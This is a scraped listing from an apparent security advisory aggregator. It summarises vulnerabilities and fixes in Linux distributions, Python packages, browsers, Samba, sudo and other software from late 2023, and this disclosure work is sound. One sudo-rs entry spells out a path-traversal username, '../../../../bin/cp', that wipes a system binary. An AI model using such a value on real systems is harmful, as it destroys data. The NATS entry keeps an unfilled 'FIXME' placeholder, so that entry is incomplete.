Auto Updating Security Advisories Database

Security Advisories

DataCategoryTitleDescriptionLink
30.10.2023 12:06:58ubuntu[USN-6457-1] Node.js vulnerabilitiesSeveral security issues were fixed in Node.js.https://secdb.nttzen.cloud/security-advisory/detail/USN-6457-1
30.10.2023 05:32:45ubuntu[USN-6456-1] Firefox vulnerabilitiesSeveral security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/detail/USN-6456-1
30.10.2023 02:00:00gentoo[GLSA-202310-17] UnZip: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in UnZip, the worst of which could lead to code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-17
30.10.2023 02:00:00gentoo[GLSA-202310-18] Rack: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Rack, the worst of which can lead to sequence injection in logging compontents.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-18
30.10.2023 02:00:00gentoo[GLSA-202310-19] Dovecot: Privilege Escalation (normal)A vulnerability has been discovered in Dovecot that can lead to a privilege escalation when master and non-master passdbs are used.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-19
30.10.2023 02:00:00gentoo[GLSA-202310-20] rxvt-unicode: Arbitrary Code Execution (high)A vulnerability has been discovered in rxvt-unicode where data written to the terminal can lead to code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-20
29.10.2023 07:01:23opensuse[openSUSE-SU-2023:0338-1] Security update for opera (important)Security update for operahttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0338-1
29.10.2023 07:01:20opensuse[openSUSE-SU-2023:0337-1] Security update for opera (important)Security update for operahttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0337-1
01.11.2023 00:42:00ubuntu[USN-6454-3] Linux kernel (ARM laptop) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6454-3
31.10.2023 23:47:40ubuntu[USN-6466-1] Linux kernel (NVIDIA) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6466-1
31.10.2023 23:14:14ubuntu[USN-6464-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6464-1
31.10.2023 23:07:14ubuntu[USN-6465-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6465-1
31.10.2023 19:15:23alpinelinux[ALPINE:CVE-2023-43796] synapse vulnerability[From CVE-2023-43796] Synapse is an open-source Matrix homeserver Prior to versions 1.95.1 and 1.96.0rc1, cached device information of remote users can be queried from Synapse. This can be used to enumerate the remote users known to a homeserver. System administrators are encouraged to upgrade to Synapse 1.95.1 or 1.96.0rc1 to receive a patch. As a workaround, the `federation_domain_whitelist` can be used to limit federation traffic with a homeserver.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-43796
31.10.2023 17:16:46ubuntu[USN-6453-2] X.Org X Server vulnerabilitiesSeveral security issues were fixed in X.Org X Server, xwayland.https://secdb.nttzen.cloud/security-advisory/detail/USN-6453-2
31.10.2023 16:47:07ubuntu[USN-6463-1] Open VM Tools vulnerabilitiesSeveral security issues were fixed in Open VM Tools.https://secdb.nttzen.cloud/security-advisory/detail/USN-6463-1
31.10.2023 16:45:57ubuntu[USN-6462-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6462-1
31.10.2023 14:51:27ubuntu[USN-6461-1] Linux kernel (OEM) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6461-1
31.10.2023 02:15:09alpinelinux[ALPINE:CVE-2023-46129] nats-server vulnerability[From CVE-2023-46129] NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing. The cryptographic key handling library, nkeys, recently gained support for encryption, not just for signing/authentication. This is used in nats-server 2.10 (Sep 2023) and newer for authentication callouts. In nkeys versions 0.4.0 through 0.4.5, corresponding with NATS server versions 2.10.0 through 2.10.3, the nkeys library's `xkeys` encryption handling logic mistakenly passed an array by value into an internal function, where the function mutated that buffer to populate the encryption key to use. As a result, all encryption was actually to an all-zeros key. This affects encryption only, not signing. FIXME: FILL IN IMPACT ON NATS-SERVER AUTH CALLOUT SECURITY. nkeys Go library 0.4.6, corresponding with NATS Server 2.10.4, has a patch for this issue. No known workarounds are available. For any application handling auth callouts in Go, if using the nkeys library, update the dependency, recompile and deploy that in lockstep.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46129
31.10.2023 02:00:00gentoo[GLSA-202310-21] ConnMan: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in ConnMan, the worst of which can lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-21
31.10.2023 02:00:00gentoo[GLSA-202310-22] Salt: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Salt, the worst of which could result in local privilege escalation.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-22
31.10.2023 02:00:00gentoo[GLSA-202310-23] libxslt: Multiple Vulnerabilities (high)Several use-after-free vulnerabilities have been found in libxslt.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-23
31.10.2023 02:00:00vmware[VMSA-2023-0025] VMware Workspace ONE UEM console updates address an open redirect vulnerability (CVE-2023-20886) (important)https://secdb.nttzen.cloud/security-advisory/detail/VMSA-2023-0025
31.10.2023 10:52:39almalinux[ALSA-2023:6167] libguestfs-winsupport security update (low)libguestfs-winsupport security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6167
31.10.2023 22:23:51pypi[PYSEC-2023-219] wagtail vulnerabilityWagtail is an open source content management system built on Django. A user with a limited-permission editor account for the Wagtail admin can make a direct URL request to the admin view that handles bulk actions on user accounts. While authentication rules prevent the user from making any changes, the error message discloses the display names of user accounts, and by modifying URL parameters, the user can retrieve the display name for any user. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 4.1.8 (LTS), 5.0.5 and 5.1.3. The fix is also included in Release Candidate 1 of the forthcoming Wagtail 5.2 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-219
01.11.2023 23:27:02ubuntu[USN-6454-4] Linux kernel (StarFive) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6454-4
01.11.2023 14:39:24ubuntu[USN-6465-2] Linux kernel (Raspberry Pi) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6465-2
01.11.2023 13:26:31ubuntu[USN-6467-1] Kerberos vulnerabilityKerberos could be made to crash if it received specially craftednetwork traffic.https://secdb.nttzen.cloud/security-advisory/detail/USN-6467-1
01.11.2023 11:29:41ubuntu[USN-6403-3] libvpx vulnerabilitiesSeveral security issues were fixed in libvpx.https://secdb.nttzen.cloud/security-advisory/detail/USN-6403-3
01.11.2023 02:00:00gentoo[GLSA-202311-01] GitPython: Code Execution via Crafted Input (high)A vulnerability has been discovered in GitPython where crafted input to Repo.clone_from can lead to code executionhttps://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-01
01.11.2023 02:00:00gentoo[GLSA-202311-02] Netatalk: Multiple Vulnerabilities including root remote code execution (high)Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code executionhttps://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-02
01.11.2023 13:40:08rubysec[RUBYSEC:RMAGICK-2023-5349] memory leak flaw was found in ruby-magick (medium)A memory leak flaw was found in ruby-magick, an interface betweenRuby and ImageMagick. This issue can lead to a denial of service(DOS) by memory exhaustion.https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RMAGICK-2023-5349
01.11.2023 20:30:02pypi[PYSEC-2023-220] nautobot vulnerabilityNautobot is a Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. In Nautobot 2.0.x, certain REST API endpoints, in combination with the `?depth=<N>` query parameter, can expose hashed user passwords as stored in the database to any authenticated user with access to these endpoints. The passwords are not exposed in plaintext. This vulnerability has been patched in version 2.0.3.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-220
01.11.2023 20:30:03pypi[PYSEC-2023-221] werkzeug vulnerabilityWerkzeug is a comprehensive WSGI web application library. If an upload of a file that starts with CR or LF and then is followed by megabytes of data without these characters: all of these bytes are appended chunk by chunk into internal bytearray and lookup for boundary is performed on growing buffer. This allows an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests. This vulnerability has been patched in version 3.0.1.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-221
02.11.2023 22:36:08ubuntu[USN-6471-1] libsndfile vulnerabilitylibsndfile could be made to crash if it received specially craftedinput.https://secdb.nttzen.cloud/security-advisory/detail/USN-6471-1
02.11.2023 12:20:42ubuntu[USN-6469-1] xrdp vulnerabilityxrdp could be made to crash or run programs if it receivedspecially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/detail/USN-6469-1
02.11.2023 11:23:47ubuntu[USN-6470-1] Axis vulnerabilityAxis could be made to crash or execute arbitrary code if it received speciallycrafted input.https://secdb.nttzen.cloud/security-advisory/detail/USN-6470-1
02.11.2023 09:00:00msrc[MS:CVE-2023-36034] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36034
02.11.2023 09:00:00msrc[MS:CVE-2023-36029] Microsoft Edge (Chromium-based) Spoofing Vulnerability (moderate)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36029
02.11.2023 09:00:00msrc[MS:CVE-2023-36022] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36022
02.11.2023 09:00:00msrc[MS:CVE-2023-5480] Chromium: CVE-2023-5480 Inappropriate implementation in Paymentshttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5480
02.11.2023 09:00:00msrc[MS:CVE-2023-5482] Chromium: CVE-2023-5482 Insufficient data validation in USBhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5482
02.11.2023 09:00:00msrc[MS:CVE-2023-5849] Chromium: CVE-2023-5849 Integer overflow in USBhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5849
02.11.2023 09:00:00msrc[MS:CVE-2023-5850] Chromium: CVE-2023-5850 Incorrect security UI in Downloadshttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5850
02.11.2023 09:00:00msrc[MS:CVE-2023-5851] Chromium: CVE-2023-5851 Inappropriate implementation in Downloadshttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5851
02.11.2023 09:00:00msrc[MS:CVE-2023-5852] Chromium: CVE-2023-5852 Use after free in Printinghttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5852
02.11.2023 09:00:00msrc[MS:CVE-2023-5853] Chromium: CVE-2023-5853 Incorrect security UI in Downloadshttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5853
02.11.2023 09:00:00msrc[MS:CVE-2023-5854] Chromium: CVE-2023-5854 Use after free in Profileshttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5854
02.11.2023 09:00:00msrc[MS:CVE-2023-5855] Chromium: CVE-2023-5855 Use after free in Reading Modehttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5855
02.11.2023 09:00:00msrc[MS:CVE-2023-5856] Chromium: CVE-2023-5856 Use after free in Side Panelhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5856
02.11.2023 09:00:00msrc[MS:CVE-2023-5857] Chromium: CVE-2023-5857 Inappropriate implementation in Downloadshttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5857
02.11.2023 09:00:00msrc[MS:CVE-2023-5858] Chromium: CVE-2023-5858 Inappropriate implementation in WebApp Providerhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5858
02.11.2023 09:00:00msrc[MS:CVE-2023-5859] Chromium: CVE-2023-5859 Incorrect security UI in Picture In Picturehttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5859
02.11.2023 12:30:06pypi[PYSEC-2023-222] django vulnerabilityAn issue was discovered in Django 3.2 before 3.2.23, 4.1 before 4.1.13, and 4.2 before 4.2.7. The NFKC normalization is slow on Windows. As a consequence, django.contrib.auth.forms.UsernameField is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-222
02.11.2023 12:30:07pypi[PYSEC-2023-223] transmute-core vulnerabilityUnsafe YAML deserialization in yaml.Loader in transmute-core before 1.13.5 allows attackers to execute arbitrary Python code.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-223
02.11.2023 05:30:29ubuntu[USN-6468-1] Thunderbird vulnerabilitiesSeveral security issues were fixed in Thunderbird.https://secdb.nttzen.cloud/security-advisory/detail/USN-6468-1
02.11.2023 18:33:16pypi[PYSEC-2023-224] twisted vulnerabilityTwisted is an event-based framework for internet applications. Prior to version 23.10.0rc1, when sending multiple HTTP requests in one TCP packet, twisted.web will process the requests asynchronously without guaranteeing the response order. If one of the endpoints is controlled by an attacker, the attacker can delay the response on purpose to manipulate the response of the second request when a victim launched two requests using HTTP pipeline. Version 23.10.0rc1 contains a patch for this issue.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-224
03.11.2023 15:15:08alpinelinux[ALPINE:CVE-2023-3961] samba vulnerability[From CVE-2023-3961] A path traversal vulnerability was identified in Samba when processing client pipe names connecting to Unix domain sockets within a private directory. Samba typically uses this mechanism to connect SMB clients to remote procedure call (RPC) services like SAMR LSA or SPOOLSS, which Samba initiates on demand. However, due to inadequate sanitization of incoming client pipe names, allowing a client to send a pipe name containing Unix directory traversal characters (../). This could result in SMB clients connecting as root to Unix domain sockets outside the private directory. If an attacker or client managed to send a pipe name resolving to an external service using an existing Unix domain socket, it could potentially lead to unauthorized access to the service and consequential adverse events, including compromise or service crashes.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-3961
03.11.2023 10:15:08alpinelinux[ALPINE:CVE-2023-4091] samba vulnerability[From CVE-2023-4091] A vulnerability was discovered in Samba, where the flaw allows SMB clients to truncate files, even with read-only permissions when the Samba VFS module "acl_xattr" is configured with "acl_xattr:ignore system acls = yes". The SMB protocol allows opening files when the client requests read-only access but then implicitly truncates the opened file to 0 bytes if the client specifies a separate OVERWRITE create disposition request. The issue arises in configurations that bypass kernel file system permissions checks, relying solely on Samba's permissions.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-4091
03.11.2023 10:15:07alpinelinux[ALPINE:CVE-2023-42670] samba vulnerability[From CVE-2023-42670] A flaw was found in Samba. It is susceptible to a vulnerability where multiple incompatible RPC listeners can be initiated, causing disruptions in the AD DC service. When Samba's RPC server experiences a high load or unresponsiveness, servers intended for non-AD DC purposes (for example, NT4-emulation "classic DCs") can erroneously start and compete for the same unix domain sockets. This issue leads to partial query responses from the AD DC, causing issues such as "The procedure number is out of range" when using tools like Active Directory Users. This flaw allows an attacker to disrupt AD DC services.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-42670
03.11.2023 07:15:30alpinelinux[ALPINE:CVE-2023-43665] py3-django vulnerability[From CVE-2023-43665] In Django 3.2 before 3.2.22, 4.1 before 4.1.12, and 4.2 before 4.2.6, the django.utils.text.Truncator chars() and words() methods (when used with html=True) are subject to a potential DoS (denial of service) attack via certain inputs with very long, potentially malformed HTML text. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which are thus also vulnerable. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-43665
03.11.2023 07:15:29alpinelinux[ALPINE:CVE-2023-41164] py3-django vulnerability[From CVE-2023-41164] In Django 3.2 before 3.2.21, 4.1 before 4.1.11, and 4.2 before 4.2.5, django.utils.encoding.uri_to_iri() is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-41164
03.11.2023 12:29:40pypi[PYSEC-2023-225] django vulnerabilityIn Django 3.2 before 3.2.21, 4.1 before 4.1.11, and 4.2 before 4.2.5, django.utils.encoding.uri_to_iri() is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-225
03.11.2023 12:29:40pypi[PYSEC-2023-226] django vulnerabilityIn Django 3.2 before 3.2.22, 4.1 before 4.1.12, and 4.2 before 4.2.6, the django.utils.text.Truncator chars() and words() methods (when used with html=True) are subject to a potential DoS (denial of service) attack via certain inputs with very long, potentially malformed HTML text. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which are thus also vulnerable. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-226
03.11.2023 12:29:41pypi[PYSEC-2023-227] pillow vulnerabilityAn issue was discovered in Pillow before 10.0.0. It is a Denial of Service that uncontrollably allocates memory to process a given task, potentially causing a service to crash by having it run out of memory. This occurs for truetype in ImageFont when textlength in an ImageDraw instance operates on a long text argument.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-227
03.11.2023 12:25:10almalinux[ALSA-2023:6265] ghostscript security update (important)ghostscript security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6265
03.11.2023 12:35:00almalinux[ALSA-2023:6266] squid security update (critical)squid security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6266
03.11.2023 13:04:44almalinux[ALSA-2023:6246] .NET 7.0 security update (moderate).NET 7.0 security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6246
03.11.2023 12:06:21almalinux[ALSA-2023:6242] .NET 6.0 security update (moderate).NET 6.0 security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6242
03.11.2023 11:22:48almalinux[ALSA-2023:6188] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6188
03.11.2023 11:28:28almalinux[ALSA-2023:6191] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6191
03.11.2023 18:28:41pypi[PYSEC-2023-228] pip vulnerabilityWhen installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-228
04.11.2023 01:01:11opensuse[openSUSE-SU-2023:0350-1] Security update for rubygem-activesupport-5.2 (moderate)Security update for rubygem-activesupport-5.2https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0350-1
04.11.2023 11:00:12opensuse[openSUSE-SU-2023:0354-1] Security update for opera (important)Security update for operahttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0354-1
04.11.2023 11:00:06opensuse[openSUSE-SU-2023:0353-1] Security update for opera (important)Security update for operahttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0353-1
04.11.2023 10:59:57opensuse[openSUSE-SU-2023:0352-1] Security update for virtualbox (important)Security update for virtualboxhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0352-1
04.11.2023 10:59:52opensuse[openSUSE-SU-2023:0351-1] Security update for virtualbox (important)Security update for virtualboxhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0351-1
06.11.2023 11:36:15ubuntu[USN-6467-2] Kerberos vulnerabilityKerberos could be made to crash if it received specially craftednetwork traffic.https://secdb.nttzen.cloud/security-advisory/detail/USN-6467-2
06.11.2023 09:15:09alpinelinux[ALPINE:CVE-2023-42669] samba vulnerability[From CVE-2023-42669] A vulnerability was found in Samba's "rpcecho" development server, a non-Windows RPC server used to test Samba's DCE/RPC stack elements. This vulnerability stems from an RPC function that can be blocked indefinitely. The issue arises because the "rpcecho" service operates with only one worker in the main RPC task, allowing calls to the "rpcecho" server to be blocked for a specified time, causing service disruptions. This disruption is triggered by a "sleep()" call in the "dcesrv_echo_TestSleep()" function under specific conditions. Authenticated users or attackers can exploit this vulnerability to make calls to the "rpcecho" server, requesting it to block for a specified duration, effectively disrupting most services and leading to a complete denial of service on the AD DC. The DoS affects all other services as "rpcecho" runs in the main RPC task.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-42669
06.11.2023 14:48:19rustsec[RUSTSEC-2023-0069] sudo-rs: Path Traversal vulnerability## ImpactAn issue was discovered where usernames containing the . and / characters could result in the corruption of specific files on the filesystem. As usernames are generally not limited by the characters they can contain, a username appearing to be a relative path can be constructed. For example we could add a user to the system containing the username ../../../../bin/cp. When logged in as a user with that name, that user could run sudo -K to clear their session record file. The session code then constructs the path to the session file by concatenating the username to the session file storage directory, resulting in a resolved path of /bin/cp. The code then clears that file, resulting in the cp binary effectively being removed from the system.An attacker needs to be able to login as a user with a constructed username. Given that such a username is unlikely to exist on an existing system, they will also need to be able to create the users with the constructed usernames.## PatchesThe bug is fixed in version 0.2.1 of sudo-rs. Sudo-rs now uses the uid for the user instead of their username for determining the filename. Note that an upgrade to this version will result in existing session files being ignored and users will be forced to re-authenticate. It also fully eliminates any possibility of path traversal, given that uids are always integer values.The issue was corrected in commit `bfdbda22968e3de43fa8246cab1681cfd5d5493d`.https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0069
07.11.2023 22:03:49slackware[SSA:2023-311-01] sudoNew sudo packages are available for Slackware 14.0, 14.1, 14.2, 15.0,and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/sudo-1.9.15-i586-1_slack15.0.txz: Upgraded. The sudoers plugin has been modified to make it more resilient to ROWHAMMER attacks on authentication and policy matching. The sudoers plugin now constructs the user time stamp file path name using the user-ID instead of the user name. This avoids a potential problem with user names that contain a path separator ('/') being interpreted as part of the path name. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-42465 https://www.cve.org/CVERecord?id=CVE-2023-42456 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 14.0:ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/sudo-1.9.15-i486-1_slack14.0.txzUpdated package for Slackware x86_64 14.0:ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/sudo-1.9.15-x86_64-1_slack14.0.txzUpdated package for Slackware 14.1:ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/sudo-1.9.15-i486-1_slack14.1.txzUpdated package for Slackware x86_64 14.1:ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/sudo-1.9.15-x86_64-1_slack14.1.txzUpdated package for Slackware 14.2:ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/sudo-1.9.15-i586-1_slack14.2.txzUpdated package for Slackware x86_64 14.2:ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/sudo-1.9.15-x86_64-1_slack14.2.txzUpdated package for Slackware 
15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/sudo-1.9.15-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/sudo-1.9.15-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.9.15-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/sudo-1.9.15-x86_64-1.txz**MD5 signatures**Slackware 14.0 package:41eaa419c635bcc57b5fbdc5721bb35f sudo-1.9.15-i486-1_slack14.0.txzSlackware x86_64 14.0 package:414ed3ca815363445f81161872cf8fc9 sudo-1.9.15-x86_64-1_slack14.0.txzSlackware 14.1 package:2d6c30e0c80a8ee87d2598df5df56dc8 sudo-1.9.15-i486-1_slack14.1.txzSlackware x86_64 14.1 package:0a42f5a17f76f2c38bfdd6f654dd1360 sudo-1.9.15-x86_64-1_slack14.1.txzSlackware 14.2 package:1d5b5d3432033dea48549612546a5aa4 sudo-1.9.15-i586-1_slack14.2.txzSlackware x86_64 14.2 package:eb20f940540160ad2f9fc8ac4aa90a39 sudo-1.9.15-x86_64-1_slack14.2.txzSlackware 15.0 package:816e1d885ff9c4f3f241cd7601f9c476 sudo-1.9.15-i586-1_slack15.0.txzSlackware x86_64 15.0 package:8274b3b03bd735ca8ae14a6c3a658127 sudo-1.9.15-x86_64-1_slack15.0.txzSlackware -current package:893214566e3e9dbeb80bae0a0b08ec20 ap/sudo-1.9.15-i586-1.txzSlackware x86_64 -current package:8788eee56c97fde7df4f02dc9d22673c ap/sudo-1.9.15-x86_64-1.txz**Installation instructions**Upgrade the package as root:`# upgradepkg sudo-1.9.15-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-311-01
07.11.2023 16:20:04ubuntu[USN-6473-1] urllib3 vulnerabilitiesSeveral security issues were fixed in urllib3.https://secdb.nttzen.cloud/security-advisory/detail/USN-6473-1
07.11.2023 09:58:02ubuntu[USN-6472-1] GNU Scientific Library vulnerabilityGNU Scientific Library could be made to crash or execute arbitrary code if itreceived specially crafted input.https://secdb.nttzen.cloud/security-advisory/detail/USN-6472-1
07.11.2023 02:00:00cisa[CISA-2023:1107] CISA Adds One Known Exploited Vulnerability to CatalogCISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1107
06.11.2023 20:15:08alpinelinux[ALPINE:CVE-2023-44398] exiv2 vulnerability[From CVE-2023-44398] Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata. An out-of-bounds write was found in Exiv2 version v0.28.0. The vulnerable function, `BmffImage::brotliUncompress`, is new in v0.28.0, so earlier versions of Exiv2 are _not_ affected. The out-of-bounds write is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. This bug is fixed in version v0.28.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-44398
06.11.2023 17:51:39suse[SUSE-SU-2023:4381-1] Security update for squid (important)Security update for squidhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4381-1
06.11.2023 17:51:25suse[SUSE-SU-2023:4380-1] Security update for squid (important)Security update for squidhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4380-1
06.11.2023 15:55:21suse[SUSE-SU-2023:4378-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4378-1
06.11.2023 14:53:28suse[SUSE-SU-2023:4377-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4377-1
06.11.2023 14:52:09suse[SUSE-SU-2023:4376-1] Security update for redis (important)Security update for redishttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4376-1
08.11.2023 02:00:00 | cisa | [CISA-2023:1108] CISA Adds One Known Exploited Vulnerability to Catalog | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1108
07.11.2023 22:15:08 | alpinelinux | [ALPINE:CVE-2023-4154] samba vulnerability | [From CVE-2023-4154] A design flaw was found in Samba's DirSync control implementation, which exposes passwords and secrets in Active Directory to privileged users and Read-Only Domain Controllers (RODCs). This flaw allows RODCs and users possessing the GET_CHANGES right to access all attributes, including sensitive secrets and passwords. Even in a default setup, RODC DC accounts, which should only replicate some passwords, can gain access to all domain secrets, including the vital krbtgt, effectively eliminating the RODC / DC distinction. Furthermore, the vulnerability fails to account for error conditions (fail open), like out-of-memory situations, potentially granting access to secret attributes, even under low-privileged attacker influence. | https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-4154
08.11.2023 22:24:49 | pypi | [PYSEC-2023-230] matrix-synapse vulnerability | Synapse is an open-source Matrix homeserver. Prior to versions 1.95.1 and 1.96.0rc1, cached device information of remote users can be queried from Synapse. This can be used to enumerate the remote users known to a homeserver. System administrators are encouraged to upgrade to Synapse 1.95.1 or 1.96.0rc1 to receive a patch. As a workaround, the `federation_domain_whitelist` can be used to limit federation traffic with a homeserver. | https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-230
